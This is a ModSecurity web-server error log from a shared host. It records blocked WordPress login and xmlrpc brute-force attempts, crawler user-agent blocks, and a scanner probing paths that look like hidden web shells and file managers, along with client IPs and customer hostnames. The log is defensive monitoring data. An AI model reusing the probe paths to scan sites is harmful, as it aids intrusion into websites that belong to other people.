[Tue May 26 13:59:49.967345 2026] [security2:error] [pid 560287:tid 560527] [client 113.22.113.75:60284] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVZ_JmX5s6sDS3wJVc0iQAAAO0"]
[Tue May 26 13:59:50.722797 2026] [security2:error] [pid 560287:tid 560520] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZ_pmX5s6sDS3wJVc0oAAAAOY"]
[Tue May 26 13:59:51.312849 2026] [security2:error] [pid 560287:tid 560545] [client 113.22.113.75:60492] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVZ_5mX5s6sDS3wJVc0rgAAAP0"]
[Tue May 26 13:59:51.746869 2026] [security2:error] [pid 560287:tid 560545] [client 113.22.113.75:60492] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVZ_5mX5s6sDS3wJVc0rgAAAP0"]
[Tue May 26 13:59:51.897909 2026] [security2:error] [pid 560287:tid 560550] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZ_5mX5s6sDS3wJVc0sQAAAQI"]
[Tue May 26 13:59:52.594545 2026] [security2:error] [pid 560287:tid 560433] [client 81.167.26.57:4935] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cicodev.org"] [uri "/robots.txt"] [unique_id "ahVaAJmX5s6sDS3wJVc0yAAAAJQ"]
[Tue May 26 13:59:52.594673 2026] [security2:error] [pid 560287:tid 560433] [client 81.167.26.57:4935] ModSecurity: Warning. Matched phrase "MJ12bot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "cicodev.org"] [uri "/robots.txt"] [unique_id "ahVaAJmX5s6sDS3wJVc0yAAAAJQ"]
[Tue May 26 13:59:53.645647 2026] [core:error] [pid 555743:tid 555969] [client 198.235.24.147:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:59:53.645668 2026] [core:error] [pid 555743:tid 555969] [client 198.235.24.147:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:59:53.675633 2026] [security2:error] [pid 560287:tid 560506] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaAZmX5s6sDS3wJVc02gAAANg"]
[Tue May 26 13:59:54.749262 2026] [security2:error] [pid 560287:tid 560458] [client 129.222.147.134:51092] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVaApmX5s6sDS3wJVc08gAAAKs"]
[Tue May 26 13:59:54.749491 2026] [security2:error] [pid 560287:tid 560458] [client 129.222.147.134:51092] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVaApmX5s6sDS3wJVc08gAAAKs"]
[Tue May 26 13:59:55.390315 2026] [security2:error] [pid 555743:tid 555892] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaAsjqAquC0YaxQjDOmwAAAR0"]
[Tue May 26 13:59:56.440062 2026] [security2:error] [pid 560287:tid 560440] [client 202.141.30.10:35350] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVaBJmX5s6sDS3wJVc1BAAAAJs"]
[Tue May 26 13:59:56.440165 2026] [security2:error] [pid 560287:tid 560440] [client 202.141.30.10:35350] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVaBJmX5s6sDS3wJVc1BAAAAJs"]
[Tue May 26 13:59:56.849434 2026] [security2:error] [pid 555743:tid 555941] [client 172.93.148.172:50844] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "www.toronto121mortgage.com"] [uri "/contact-us.php"] [unique_id "ahVaBMjqAquC0YaxQjDOsAAAAU4"]
[Tue May 26 13:59:56.849475 2026] [security2:error] [pid 555743:tid 555941] [client 172.93.148.172:50844] ModSecurity: Access denied with code 409 (phase 2). Match of "eq 1" against "&REQUEST_COOKIES:humans_21909" required. [file "/opt/mod_security/hg_rules.conf"] [line "1552"] [id "900424"] [msg "Transparent Bot Detection for Contact Forms"] [hostname "www.toronto121mortgage.com"] [uri "/contact-us.php"] [unique_id "ahVaBMjqAquC0YaxQjDOsAAAAU4"]
[Tue May 26 13:59:57.036888 2026] [security2:error] [pid 560287:tid 560375] [remote 5.42.158.148:47142] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahVaBJmX5s6sDS3wJVc1BwAA01Y"]
[Tue May 26 13:59:57.612303 2026] [security2:error] [pid 555743:tid 555949] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaBcjqAquC0YaxQjDOuQAAAVY"]
[Tue May 26 13:59:57.956869 2026] [security2:error] [pid 555743:tid 555826] [remote 65.2.90.30:46304] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.90.2.65.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahVaBcjqAquC0YaxQjDOwAABM1I"]
[Tue May 26 13:59:58.335569 2026] [security2:error] [pid 560287:tid 560437] [client 8.217.208.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVaBpmX5s6sDS3wJVc1GQAAAJg"]
[Tue May 26 13:59:58.578777 2026] [security2:error] [pid 555743:tid 555960] [client 172.93.148.172:50854] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "www.toronto121mortgage.com"] [uri "/contact-us.php"] [unique_id "ahVaBsjqAquC0YaxQjDOyAAAAWE"]
[Tue May 26 13:59:59.335882 2026] [security2:error] [pid 560287:tid 560543] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaBpmX5s6sDS3wJVc1JAAAAPs"]
[Tue May 26 14:00:00.204566 2026] [security2:error] [pid 560287:tid 560459] [client 91.218.223.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaB5mX5s6sDS3wJVc1OgAAAKw"]
[Tue May 26 14:00:00.549204 2026] [security2:error] [pid 555743:tid 555807] [remote 143.198.237.186:37290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 186.237.198.143.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVaCMjqAquC0YaxQjDO2wABDj8"]
[Tue May 26 14:00:01.169880 2026] [security2:error] [pid 560287:tid 560438] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaCJmX5s6sDS3wJVc1SAAAAJk"]
[Tue May 26 14:00:02.838841 2026] [security2:error] [pid 560287:tid 560452] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaCpmX5s6sDS3wJVc1WwAAAKY"]
[Tue May 26 14:00:04.987332 2026] [security2:error] [pid 555743:tid 555880] [client 129.222.147.134:25673] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVaDMjqAquC0YaxQjDPCwAAARE"]
[Tue May 26 14:00:04.995068 2026] [security2:error] [pid 555743:tid 555880] [client 129.222.147.134:25673] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVaDMjqAquC0YaxQjDPCwAAARE"]
[Tue May 26 14:00:06.269584 2026] [security2:error] [pid 555743:tid 555975] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaDcjqAquC0YaxQjDPIQAAAXA"]
[Tue May 26 14:00:07.399814 2026] [security2:error] [pid 560287:tid 560518] [client 202.141.30.10:35482] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVaD5mX5s6sDS3wJVc1lwAAAOQ"]
[Tue May 26 14:00:07.399995 2026] [security2:error] [pid 560287:tid 560518] [client 202.141.30.10:35482] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVaD5mX5s6sDS3wJVc1lwAAAOQ"]
[Tue May 26 14:00:07.785017 2026] [security2:error] [pid 560287:tid 560470] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaD5mX5s6sDS3wJVc1mgAAALY"]
[Tue May 26 14:00:08.329026 2026] [security2:error] [pid 560287:tid 560413] [remote 91.227.122.219:40188] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.122.227.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVaEJmX5s6sDS3wJVc1ogAAt3w"]
[Tue May 26 14:00:08.972425 2026] [security2:error] [pid 560287:tid 560445] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaEJmX5s6sDS3wJVc1qgAAAJ8"]
[Tue May 26 14:00:10.507684 2026] [security2:error] [pid 555743:tid 555940] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaEsjqAquC0YaxQjDPXwAAAU0"]
[Tue May 26 14:00:11.928996 2026] [security2:error] [pid 560287:tid 560496] [client 35.237.86.228:50813] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.86.237.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "makwasi.com"] [uri "/xmlrpc.php"] [unique_id "ahVaE5mX5s6sDS3wJVc12QAAAM8"]
[Tue May 26 14:00:12.124911 2026] [security2:error] [pid 560287:tid 560432] [client 35.237.86.228:65511] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "makwasi.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahVaFJmX5s6sDS3wJVc14AAAAJM"]
[Tue May 26 14:00:12.333910 2026] [security2:error] [pid 560287:tid 560515] [client 35.237.86.228:50850] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "makwasi.com"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahVaFJmX5s6sDS3wJVc14wAAAOE"]
[Tue May 26 14:00:12.667493 2026] [security2:error] [pid 560287:tid 560428] [client 35.237.86.228:52524] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "makwasi.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahVaFJmX5s6sDS3wJVc18QAAAI8"]
[Tue May 26 14:00:12.780061 2026] [security2:error] [pid 560287:tid 560452] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaFJmX5s6sDS3wJVc15wAAAKY"]
[Tue May 26 14:00:13.016877 2026] [security2:error] [pid 560287:tid 560489] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaFJmX5s6sDS3wJVc17QAAAMg"]
[Tue May 26 14:00:13.095463 2026] [security2:error] [pid 560287:tid 560423] [client 35.237.86.228:65235] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "makwasi.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVaFZmX5s6sDS3wJVc1-AAAAIo"]
[Tue May 26 14:00:13.463665 2026] [security2:error] [pid 560287:tid 560436] [client 35.237.86.228:57751] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "makwasi.com"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahVaFZmX5s6sDS3wJVc1-gAAAJc"]
[Tue May 26 14:00:13.841254 2026] [security2:error] [pid 560287:tid 560435] [client 35.237.86.228:58539] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "makwasi.com"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahVaFZmX5s6sDS3wJVc1_gAAAJY"]
[Tue May 26 14:00:14.115968 2026] [security2:error] [pid 560287:tid 560533] [client 35.237.86.228:49870] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "makwasi.com"] [uri "/2021/wp-includes/wlwmanifest.xml"] [unique_id "ahVaFpmX5s6sDS3wJVc2BQAAAPM"]
[Tue May 26 14:00:14.349669 2026] [security2:error] [pid 560287:tid 560424] [client 35.237.86.228:55816] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "makwasi.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahVaFpmX5s6sDS3wJVc2DAAAAIs"]
[Tue May 26 14:00:14.725732 2026] [security2:error] [pid 560287:tid 560531] [client 35.237.86.228:50239] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "makwasi.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahVaFpmX5s6sDS3wJVc2EwAAAPE"]
[Tue May 26 14:00:14.991001 2026] [security2:error] [pid 560287:tid 560503] [client 35.237.86.228:54804] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "makwasi.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVaFpmX5s6sDS3wJVc2FAAAANU"]
[Tue May 26 14:00:15.253331 2026] [security2:error] [pid 560287:tid 560488] [client 129.222.147.134:17405] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVaF5mX5s6sDS3wJVc2IQAAAMc"]
[Tue May 26 14:00:15.253512 2026] [security2:error] [pid 560287:tid 560488] [client 129.222.147.134:17405] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVaF5mX5s6sDS3wJVc2IQAAAMc"]
[Tue May 26 14:00:15.334267 2026] [security2:error] [pid 560287:tid 560494] [client 35.237.86.228:62665] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "makwasi.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahVaF5mX5s6sDS3wJVc2IgAAAM0"]
[Tue May 26 14:00:15.789824 2026] [security2:error] [pid 560287:tid 560528] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaF5mX5s6sDS3wJVc2JQAAAO4"]
[Tue May 26 14:00:16.503761 2026] [security2:error] [pid 560287:tid 560442] [client 20.48.248.215:24214] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVaGJmX5s6sDS3wJVc2OwAAAJw"]
[Tue May 26 14:00:16.503932 2026] [security2:error] [pid 560287:tid 560442] [client 20.48.248.215:24214] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVaGJmX5s6sDS3wJVc2OwAAAJw"]
[Tue May 26 14:00:16.791818 2026] [security2:error] [pid 560287:tid 560430] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaGJmX5s6sDS3wJVc2NwAAAJE"]
[Tue May 26 14:00:17.147453 2026] [security2:error] [pid 560287:tid 560527] [client 20.48.248.215:24761] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/adminfuns.php"] [unique_id "ahVaGZmX5s6sDS3wJVc2RgAAAO0"]
[Tue May 26 14:00:17.147580 2026] [security2:error] [pid 560287:tid 560527] [client 20.48.248.215:24761] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/adminfuns.php"] [unique_id "ahVaGZmX5s6sDS3wJVc2RgAAAO0"]
[Tue May 26 14:00:18.179085 2026] [security2:error] [pid 560287:tid 560541] [client 20.48.248.215:24719] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/sx_pms.php"] [unique_id "ahVaGpmX5s6sDS3wJVc2VgAAAPk"]
[Tue May 26 14:00:18.179194 2026] [security2:error] [pid 560287:tid 560541] [client 20.48.248.215:24719] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/sx_pms.php"] [unique_id "ahVaGpmX5s6sDS3wJVc2VgAAAPk"]
[Tue May 26 14:00:18.307062 2026] [security2:error] [pid 560287:tid 560512] [client 202.141.30.10:35376] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVaGpmX5s6sDS3wJVc2XQAAAN4"]
[Tue May 26 14:00:18.307168 2026] [security2:error] [pid 560287:tid 560512] [client 202.141.30.10:35376] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVaGpmX5s6sDS3wJVc2XQAAAN4"]
[Tue May 26 14:00:18.734983 2026] [security2:error] [pid 560287:tid 560491] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaGpmX5s6sDS3wJVc2XgAAAMo"]
[Tue May 26 14:00:19.628479 2026] [security2:error] [pid 560287:tid 560543] [client 20.48.248.215:24705] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/wp-info.php"] [unique_id "ahVaG5mX5s6sDS3wJVc2cQAAAPs"]
[Tue May 26 14:00:19.628619 2026] [security2:error] [pid 560287:tid 560543] [client 20.48.248.215:24705] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/wp-info.php"] [unique_id "ahVaG5mX5s6sDS3wJVc2cQAAAPs"]
